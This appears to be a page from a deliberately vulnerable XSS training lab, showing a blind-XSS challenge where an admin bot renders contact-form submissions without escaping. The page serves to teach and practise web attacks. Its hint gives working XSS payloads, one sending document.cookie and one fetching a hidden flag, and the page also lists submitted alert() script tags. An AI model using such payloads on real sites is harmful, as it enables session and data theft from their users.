XSS DETECTED! Alert was called!

Advanced XSS Lab

WAF Bypass | CSP Evasion | Filter Bypass | Advanced Techniques
ADVANCED

Challenges

1 WAF Bypass - Script Tag Blocked 2 WAF Bypass - Event Handler Blocked 3 WAF Bypass - Case & Encoding 4 CSP Bypass - Nonce 5 CSP Bypass - unsafe-inline blocked 6 Mutation XSS (mXSS) 7 Blind XSS 8 Polyglot XSS
Level 7: Blind XSS
Submit a payload via the contact form. An admin bot will review it at a hidden /admin page. Your XSS fires there! Steal the flag from the admin page.
Expert
Blind XSS: Your payload is stored and rendered on the admin page at /admin.
The admin page does NOT escape HTML. Your XSS will execute there.
Use this to exfiltrate data. The flag is available at: /index.php?blind_flag=1 (returns JSON).
Submitted Messages
2026-05-03 14:56:49
<script>alert(document.domain)</script>
2026-05-03 14:52:19
<script>alert()</script>
Show Hint
The admin page at /admin renders your submission WITHOUT escaping. Use a payload like: <script>new Image().src='/index.php?blind_flag=1&c='+document.cookie</script> or use fetch() to send the flag. For this lab, the flag is directly visible when XSS fires. Try: <img src=x onerror="fetch('/index.php?blind_flag=1').then(r=>r.json()).then(d=>document.body.innerHTML+='FLAG:'+d.flag)">